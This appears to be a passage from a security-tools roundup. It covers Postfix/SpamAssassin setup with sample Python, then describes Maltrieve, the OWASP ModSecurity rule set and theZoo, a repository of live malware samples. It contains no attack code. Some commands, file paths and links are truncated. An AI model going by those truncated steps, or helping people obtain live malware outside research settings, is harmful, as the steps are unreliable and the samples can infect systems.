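    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if line[0].isspace() and entries:
            entries[-1] += " " + line.strip()
        else:
            entries.append(line.strip())
    return entries


def filter_is_wired(text, filter_name="spamassassin"):
    """True if the smtp service references the filter and the filter's pipe service exists."""
    fields = [entry.split() for entry in parse_master_cf(text)]
    fields = [f for f in fields if len(f) >= 2]
    smtp_ok = any(
        f[0] == "smtp" and f[1] == "inet" and "content_filter=" + filter_name in f
        for f in fields
    )
    pipe_ok = any(
        f[0] == filter_name and f[1] == "unix" and "pipe" in f
        for f in fields
    )
    return smtp_ok and pipe_ok
```

Calling filter_is_wired on the contents of the edited file should return True once both the -o content_filter=spamassassin option and the spamassassin pipe entry are present.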

Configuring Spamassassin

To get the maximum use of Spamassassin you have to create rules.

Open the Spamassassin default rules file using:

nano /etc/spamassassin/

To activate a rule, uncomment its line by removing the leading # symbol.

To add a spam header to spam mail uncomment or add the line:

rewrite_header Subject [***** SPAM _SCORE_ *****]

Spamassassin gives a score to each mail after running different tests on it. The following line will mark the mail as spam if its score reaches or exceeds the value specified in the rule.

required_score           3.0
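
The scoring idea can be illustrated with a toy example. The Python sketch below is not how Spamassassin is implemented: the test names and weights are hypothetical, and it only shows the principle of summing the weights of matching tests and comparing the total with the required score.

```python
REQUIRED_SCORE = 3.0  # mirrors the required_score value used above

# Hypothetical tests and weights, for illustration only.
HYPOTHETICAL_TESTS = {
    "subject_all_caps": (lambda m: m["subject"].isupper(), 1.5),
    "mentions_free_money": (lambda m: "free money" in m["body"].lower(), 2.0),
    "missing_sender": (lambda m: not m.get("from"), 1.0),
}


def score_message(message):
    """Return (total score, sorted names of the tests that matched)."""
    hits = {
        name: weight
        for name, (test, weight) in HYPOTHETICAL_TESTS.items()
        if test(message)
    }
    return sum(hits.values()), sorted(hits)


def is_spam(message, required=REQUIRED_SCORE):
    """A message counts as spam once its total reaches the required score."""
    total, _ = score_message(message)
    return total >= required
```

Lowering the required score makes the filter more aggressive, at the cost of more legitimate mail being flagged.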

To use Bayes’ theorem to check mail, uncomment or add the line:

use_bayes               1

To enable bayes auto learning, uncomment or add the line:

bayes_auto_learn        1

After adding the above details, save the file and restart Spamassassin.

service spamassassin restart


To see if Spamassassin is working, you can check the spamassassin log file using:

nano /var/log/spamassassin/spamd.log

or send an email from an external server and check the mail headers.
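
Checking the headers can also be scripted. The sketch below assumes the filtered message carries an X-Spam-Status header of the usual form (for example "Yes, score=7.2 required=3.0 tests=..."); the function name spam_status is made up for this example, and the header layout on your server may differ depending on configuration.

```python
import email
import re


def spam_status(raw_message):
    """Extract the verdict, score and threshold from a raw message, or None if untagged."""
    msg = email.message_from_string(raw_message)
    header = msg.get("X-Spam-Status")
    if header is None:
        return None
    # Long headers may be folded across lines; collapse the whitespace first.
    header = " ".join(header.split())
    score = re.search(r"score=(-?\d+(?:\.\d+)?)", header)
    required = re.search(r"required=(-?\d+(?:\.\d+)?)", header)
    return {
        "flagged": header.lower().startswith("yes"),
        "score": float(score.group(1)) if score else None,
        "required": float(required.group(1)) if required else None,
    }
```

A result of None means the message never passed through the filter, which usually points back at the Postfix configuration rather than at the rules.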

Maltrieve – A tool to retrieve malware directly from the source for security researchers.


Maltrieve originated as a fork of mwcrawler.

This tool retrieves malware directly from the sources as listed at a number of sites, including:

These lists will be implemented if/when they return to activity.


  • Proxy support
  • Multithreading for improved performance
  • Logging of source URLs
  • Multiple user agent support
  • Better error handling
  • VxCage and Cuckoo Sandbox support



Basic execution: python


usage: [-h] [-p PROXY] [-d DUMPDIR] [-l LOGFILE] [-x] [-c]

optional arguments:
  -h, --help            show this help message and exit
  -p PROXY, --proxy PROXY
                        Define HTTP proxy as address:port
  -d DUMPDIR, --dumpdir DUMPDIR
                        Define dump directory for retrieved files
  -l LOGFILE, --logfile LOGFILE
                        Define file for logging progress
  -x, --vxcage          Dump the file to a VxCage instance running on the
  -c, --cuckoo          Enable cuckoo analysis

More information can be found at:

OWASP ModSecurity Core Rule Set (CRS)

The OWASP ModSecurity CRS Project’s goal is to provide an easily “pluggable” set of generic attack detection rules that provide a base level of protection for any web application.


The OWASP ModSecurity CRS is a set of web application defense rules for the open source, cross-platform ModSecurity Web Application Firewall (WAF).


The OWASP ModSecurity CRS provides protections in the following attack/threat categories:

  • HTTP Protection – detecting violations of the HTTP protocol and a locally defined usage policy.
  • Real-time Blacklist Lookups – utilizes 3rd Party IP Reputation
  • HTTP Denial of Service Protections – defense against HTTP Flooding and Slow HTTP DoS Attacks.
  • Common Web Attacks Protection – detecting common web application security attacks.
  • Automation Detection – Detecting bots, crawlers, scanners and other surface malicious activity.
  • Integration with AV Scanning for File Uploads – detects malicious files uploaded through the web application.
  • Tracking Sensitive Data – Tracks Credit Card usage and blocks leakages.
  • Trojan Protection – Detecting access to Trojan horses.
  • Identification of Application Defects – alerts on application misconfigurations.
  • Error Detection and Hiding – Disguising error messages sent by the server.


OWASP ModSecurity CRS is free to use. It is licensed under the Apache Software License version 2 (ASLv2), so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

Open HUB

more info can be found at: and here:

theZoo – A repository of LIVE malwares for your own joy and pleasure


theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis we have decided to gather all of them for you in an available and safe way. theZoo was born by Yuval tisf Nativ and is now maintained by Shahak Shalev.

theZoo is open and welcoming visitors!


theZoo’s purpose is to allow the study of malware and to give people who are interested in malware analysis, perhaps as part of their job, access to live malware so that they can analyse how it operates and, for advanced and savvy users, block specific malware within their own environment.

Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


theZoo – the most awesome free malware database on the air Copyright (C) 2015, Yuval Nativ, Lahad Ludar, 5fingers

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see

Documentation and Notes


theZoo’s objective is to offer a fast and easy way of retrieving malware samples and source code in an organized fashion in hopes of promoting malware research.

Root Files:

Since version 0.42 theZoo has been undergoing dramatic changes. It now runs in both CLI and ARGVS modes. You can call the program with the same command line arguments as before. The current default state of theZoo runtime is the CLI. The following files and directories are responsible for the application’s behaviour.


The conf folder holds files that are relevant to a particular run of the program but are not part of the application itself. Among other things, you can find the EULA file in the conf folder.


Contains .py and .pyc import files used by the rest of the application


The actual malware samples – be careful!


Malware source code :)

Directory Structure:

Each directory is composed of 4 files:

  • Malware files in an encrypted ZIP archive.
  • SHA256 sum of the 1st file.
  • MD5 sum of the 1st file.
  • Password file for the archive.
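
Because each directory ships both checksum files, the encrypted archive can be integrity-checked without ever extracting it. The following Python sketch shows one way to do that. The file naming (<stem>.zip, <stem>.sha256, <stem>.md5) and the function names are assumptions made for this example, so adjust them to match the directory you are inspecting.

```python
import hashlib
from pathlib import Path


def file_digest(path, algorithm):
    """Hash a file in chunks so large archives are not loaded into memory at once."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_sample_dir(directory, stem):
    """Compare the archive's digests with the stored sum files.

    Assumed layout (hypothetical names): <stem>.zip, <stem>.sha256, <stem>.md5.
    The archive is only read as bytes; it is never decrypted or extracted.
    """
    directory = Path(directory)
    archive = directory / (stem + ".zip")
    results = {}
    for algorithm, suffix in (("sha256", ".sha256"), ("md5", ".md5")):
        # Sum files often contain "<hex digest>  <filename>"; keep the first token.
        recorded = (directory / (stem + suffix)).read_text().split()[0].lower()
        results[algorithm] = file_digest(archive, algorithm) == recorded
    return results
```

If either value comes back False, the archive differs from what was indexed and should not be trusted.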

Structure of maldb.db

maldb.db is the database that theZoo uses to find the malware indexed on your drive. The structure is as follows:

  • UID – Determined based on the indexing process.
  • Location – The location on the drive of the malware you have searched for.
  • Type – Sorts the different types of malware there are. So far we sort by: Virus, Trojans, Botnets, Ransomware, Spyware
  • Name – Just the name of the malware.
  • Version – Nothing to say here as well.
  • Author – … I’m not that into documentation…
  • Programming Language – The state of the malware as for source, bin or which type of source. c/cpp/bin…
  • Date – See ‘Author’ section.
  • Architecture – The arch the platform was built for. Can be x86, x64, arm7….
  • Platform – Win32, Win64, *nix32, *nix64, iOS, android and so on.
  • Comments – Any comments there may be about the item.
  • Tags – Tags matching the item.
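
To make the field list concrete, here is a small Python sketch that models the same twelve fields as an in-memory SQLite table and looks entries up by type. The table name, column names and the sample row are hypothetical and are not taken from theZoo's code, so treat this as an illustration of the record layout rather than the real schema.

```python
import sqlite3

# Column names mirror the field list above; the exact names are assumptions.
FIELDS = [
    "uid", "location", "type", "name", "version", "author",
    "language", "date", "architecture", "platform", "comments", "tags",
]


def build_index(rows):
    """Create an in-memory index table and load the given 12-field rows into it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE malware (%s)" % ", ".join(FIELDS))
    placeholders = ", ".join("?" for _ in FIELDS)
    conn.executemany("INSERT INTO malware VALUES (%s)" % placeholders, rows)
    return conn


def find_by_type(conn, malware_type):
    """Return (name, location) pairs for every indexed entry of the given type."""
    cursor = conn.execute(
        "SELECT name, location FROM malware WHERE type = ? ORDER BY name",
        (malware_type,),
    )
    return cursor.fetchall()


# Placeholder record for illustration; not a real entry from the database.
EXAMPLE_ROW = (
    1, "samples/example-a", "Trojans", "Example.A", "1.0", "unknown",
    "bin", "2015", "x86", "Win32", "placeholder entry", "demo",
)
```

Searching by any other field works the same way: only the WHERE clause changes.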

An example line will look as follows:


Bugs and Reports

The repository holding all files is currently